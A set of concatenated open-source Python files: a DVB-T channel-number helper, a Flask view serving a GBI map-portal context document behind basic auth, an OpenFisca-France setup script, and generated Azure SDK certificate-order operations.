d = (f + 1) % 7
return str(int(f - 174)/7 + 5) + (d < 3 and "-" or d > 4 and "+" or "")
elif 470 <= f < 863: # IV,V
d = (f + 2) % 8
return str(int(f - 470) / 8 + 21) + (d < 3.5 and "-" or d > 4.5 and "+" or "")
elif "Australia" in descr:
d = (f + 1) % 7
ds = (d < 3 and "-" or d > 4 and "+" or "")
if 174 < f < 202: # CH6-CH9
return str(int(f - 174)/7 + 6) + ds
elif 202 <= f < 209: # CH9A
return "9A" + ds
elif 209 <= f < 230: # CH10-CH12
return str(int(f - 209)/7 + 10) + ds
elif 526 < f < 820: # CH28-CH69
d = (f - 1) % 7
return str(int(f - 526)/7 + 28) + (d < 3 and "-" or d > 4 and "+" or "")
return ""
def getMHz(self, frequency):
if str(frequency).endswith('MHz'):
return frequency.split()[0]
return (frequency+50000)/100000/10.
def getTunerDescription(self, nim):
description = ""
try:
description = nimmanager.getTerrestrialDescription(nim)
except:
print "[ChannelNumber] nimmanager.getTerrestrialDescription(nim) failed, nim:", nim
return description
def supportedChannels(self, nim):
descr = self.getTunerDescription(nim)
if "Europe" in descr and "DVB-T" in descr:
return True
return False
def channel2frequency(self, channel, nim):
descr = self.getTunerDescription(nim)
if "Europe" in descr and "DVB-T" in descr:
if 5 <= channel <= 12:
return (177500 + 7000*(channel- 5))*1000
elif 21 <= channel <= 69:
return (474000 + 8000*(channel-21))*1000
return 474000000
channelnumbers = ChannelNumbers()
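# Rough usage sketch (assumes the tuner description reports a European DVB-T
# tuner; nim index 0 is an example):
#   channelnumbers.getChannelNumber(474000000, 0)  # -> "21" (band IV/V)
#   channelnumbers.channel2frequency(21, 0)        # -> 474000000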
| gpl-2.0 |
omniscale/gbi-server | app/gbi_server/views/context.py | 1 | 8042 | # This file is part of the GBI project.
# Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from functools import wraps
from flask import Blueprint, request, Response, g, url_for, current_app
from flask.ext.babel import gettext as _
from sqlalchemy.sql.expression import desc
from geoalchemy2.functions import ST_AsGeoJSON, ST_Transform
from gbi_server.config import SystemConfig
from gbi_server.model import WMTS, WMS, WFS, User
from gbi_server.extensions import db
from gbi_server.lib.couchdb import CouchDBBox, init_user_boxes
context = Blueprint("context", __name__, template_folder="../templates")
def check_auth(username, password):
user = User.by_email(username)
if user and user.check_password(password) and user.active:
g.user = user
return True
else:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return Response("""
Could not verify your access level for that URL.
You have to login with proper credentials""", 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
return f(*args, **kwargs)
return decorated
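# Illustrative request against a requires_auth-protected endpoint
# (host and credentials are placeholders):
#   curl -u [email protected]:secret https://portal.example.org/context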
@context.route('/context')
@requires_auth
def get_context_document():
init_user_boxes(g.user, current_app.config.get('COUCH_DB_URL'))
wmts_sources = db.session.query(WMTS, ST_AsGeoJSON(ST_Transform(WMTS.view_coverage, 3857))).order_by(desc(WMTS.is_background_layer)).all()
wms_sources = db.session.query(WMS, ST_AsGeoJSON(ST_Transform(WMS.view_coverage, 3857))).order_by(desc(WMS.is_background_layer)).all()
wfs_sources = db.session.query(WFS).all()
response = {
"version": "0.2",
"portal": {
"prefix": current_app.config['PORTAL_PREFIX'],
"title": current_app.config['PORTAL_TITLE'],
},
"wmts_sources": [],
"wms_sources": [],
"wfs_sources": [],
"couchdb_sources": [],
}
couchdb = CouchDBBox(current_app.config['COUCH_DB_URL'], '%s_%s' % (SystemConfig.AREA_BOX_NAME, g.user.id))
for source in wmts_sources:
wmts, view_coverage = source
geom = json.loads(view_coverage)
response['wmts_sources'].append({
"name": wmts.name,
"title": wmts.title,
"url": wmts.client_url(external=True),
"format": wmts.format,
"overlay": wmts.is_overlay,
"username": wmts.username,
"password": wmts.password,
"is_public": wmts.is_public,
"is_protected": wmts.is_protected,
"is_background_layer": wmts.is_background_layer,
"max_tiles": wmts.max_tiles,
"view_restriction": {
"zoom_level_start": wmts.view_level_start,
"zoom_level_end": wmts.view_level_end,
"geometry": geom
},
"download_restriction": {
"zoom_level_start": wmts.view_level_start,
"zoom_level_end": wmts.view_level_end,
}
})
for source in wms_sources:
wms, view_coverage = source
geom = json.loads(view_coverage)
response['wms_sources'].append({
"name": wms.name,
"title": wms.title,
"url": wms.url,
"layer": wms.layer,
"format": wms.format,
"overlay": wms.is_overlay,
"username": wms.username,
"password": wms.password,
"is_public": wms.is_public,
"is_protected": wms.is_protected,
"srs": wms.srs,
"wms_version": wms.version,
"view_restriction": {
"zoom_level_start": wms.view_level_start,
"zoom_level_end": wms.view_level_end,
"geometry": geom
},
"download_restriction": {
"zoom_level_start": wms.view_level_start,
"zoom_level_end": wms.view_level_end,
}
})
for wfs in wfs_sources:
response['wfs_sources'].append({
'id': wfs.id,
'name': wfs.name,
'layer': wfs.layer,
'host': wfs.host,
'url': wfs.url,
'srs': wfs.srs,
'geometry_field': wfs.geometry,
'feature_ns': wfs.ns_uri,
'typename': wfs.ns_prefix,
'search_property': wfs.search_property,
'username': wfs.username,
'password': wfs.password,
'is_protected': wfs.is_protected,
})
if current_app.config['FEATURE_AREA_BOXES']:
response['couchdb_sources'].append({
"name": _('area box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.AREA_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
"dbname_user": SystemConfig.AREA_BOX_NAME_LOCAL,
})
if current_app.config['FEATURE_DOC_BOXES']:
if g.user.is_consultant:
response['couchdb_sources'].append({
"name": _('file box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.FILE_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
"dbname_user": SystemConfig.FILE_BOX_NAME_LOCAL,
})
else:
response['couchdb_sources'].append({
"name": _('consultant box'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.DOWNLOAD_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": False,
"dbname_user": SystemConfig.DOWNLOAD_BOX_NAME_LOCAL,
})
response['couchdb_sources'].append({
"name": _('uploadbox'),
"url": current_app.config['COUCH_DB_URL'],
"dbname": '%s_%s' % (SystemConfig.UPLOAD_BOX_NAME, g.user.id),
"username": 'user_%d' % g.user.id,
"password": g.user.authproxy_token,
"writable": True,
"dbname_user": SystemConfig.UPLOAD_BOX_NAME_LOCAL,
})
if current_app.config['PARCEL_SEARCH_DATABASE_URI']:
response['parcel_search_url'] = url_for('search.query', token=g.user.authproxy_token, _external=True)
response['logging'] = {
'url': url_for('logserv.log', user_token=g.user.authproxy_token, _external=True),
}
response['update_coverage'] = {
'url': url_for('authproxy.update_download_coverage',
user_token=g.user.authproxy_token,
_external=True
),
}
response['user'] = {
'email': g.user.email,
'type': g.user.type,
'type_name': g.user.type_name,
}
return json.dumps(response)
| apache-2.0 |
adrienpacifico/openfisca-france | setup.py | 1 | 1776 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
""" -- a versatile microsimulation free software"""
from setuptools import setup, find_packages
setup(
name = 'OpenFisca-France',
version = '0.5.4.dev0',
author = 'OpenFisca Team',
author_email = '[email protected]',
classifiers = [
"Development Status :: 2 - Pre-Alpha",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Operating System :: POSIX",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Information Analysis",
],
description = u'French tax and benefit system for OpenFisca',
keywords = 'benefit france microsimulation social tax',
license = 'http://www.fsf.org/licensing/licenses/agpl-3.0.html',
url = 'https://github.com/openfisca/openfisca-france',
data_files = [
('share/locale/fr/LC_MESSAGES', ['openfisca_france/i18n/fr/LC_MESSAGES/openfisca-france.mo']),
('share/openfisca/openfisca-france', ['CHANGELOG.md', 'LICENSE', 'README.md']),
],
extras_require = {
'inversion_revenus': [
'scipy >= 0.12',
],
'taxipp': [
'pandas >= 0.13',
],
'test': [
'nose',
],
},
include_package_data = True, # Will read MANIFEST.in
install_requires = [
'Babel >= 0.9.4',
'Biryani[datetimeconv] >= 0.10.4',
'numpy >= 1.6,< 1.10',
'OpenFisca-Core >= 0.5.0',
'PyYAML >= 3.10',
'requests >= 2.8',
],
message_extractors = {'openfisca_france': [
('**.py', 'python', None),
]},
packages = find_packages(exclude=['openfisca_france.tests*']),
test_suite = 'nose.collector',
)
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2018_02_01/operations/_app_service_certificate_orders_operations.py | 1 | 76895 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class AppServiceCertificateOrdersOperations(object):
"""AppServiceCertificateOrdersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateOrderCollection"]
"""List all certificate orders in a subscription.
List all certificate orders in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateOrderCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrderCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrderCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.CertificateRegistration/certificateOrders'} # type: ignore
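    # Minimal usage sketch (assumes a configured WebSiteManagementClient named
    # `client`; the attribute path mirrors this operations class):
    #   for order in client.app_service_certificate_orders.list():
    #       print(order.name)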
def validate_purchase_information(
self,
app_service_certificate_order, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> None
"""Validate information for a certificate order.
Validate information for a certificate order.
:param app_service_certificate_order: Information for a certificate order.
:type app_service_certificate_order: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.validate_purchase_information.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_service_certificate_order, 'AppServiceCertificateOrder')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
validate_purchase_information.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.CertificateRegistration/validateCertificateRegistrationInformation'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.AppServiceCertificateOrderCollection"]
"""Get certificate orders in a resource group.
Get certificate orders in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceCertificateOrderCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrderCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrderCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders'} # type: ignore
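# Usage sketch (assumes the `client` shown above): the returned ItemPaged is
# a lazy iterator that follows next_link paging transparently:
#   for order in client.app_service_certificate_orders.list_by_resource_group("my-rg"):
#       print(order.name)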
def get(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
"""Get a certificate order.
Get a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateOrder, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
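# Usage sketch (assumes the `client` shown above; names are placeholders):
#   order = client.app_service_certificate_orders.get("my-rg", "my-order")
#   print(order.name)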
def _create_or_update_initial(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_distinguished_name, 'AppServiceCertificateOrder')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrder"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.AppServiceCertificateOrder"]
"""Create or update a certificate purchase order.
Create or update a certificate purchase order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param certificate_distinguished_name: Distinguished name to use for the certificate order.
:type certificate_distinguished_name: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceCertificateOrder or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
certificate_order_name=certificate_order_name,
certificate_distinguished_name=certificate_distinguished_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
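# Usage sketch (assumes the `client` shown above and an
# AppServiceCertificateOrder payload `order_spec`): begin_* methods return an
# LROPoller, so the final resource is obtained by blocking on .result():
#   poller = client.app_service_certificate_orders.begin_create_or_update(
#       "my-rg", "my-order", order_spec)
#   created = poller.result()  # polls (ARMPolling by default) until done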
def delete(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete an existing certificate order.
Delete an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}'} # type: ignore
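# Usage sketch (assumes the `client` shown above); delete is synchronous and
# returns None on 200/204:
#   client.app_service_certificate_orders.delete("my-rg", "my-order")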
def update(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
certificate_distinguished_name, # type: "_models.AppServiceCertificateOrderPatchResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateOrder"
"""Create or update a certificate purchase order.
Create or update a certificate purchase order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param certificate_distinguished_name: Distinguished name to use for the certificate order.
:type certificate_distinguished_name: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrderPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateOrder, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateOrder
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateOrder"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(certificate_distinguished_name, 'AppServiceCertificateOrderPatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateOrder', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
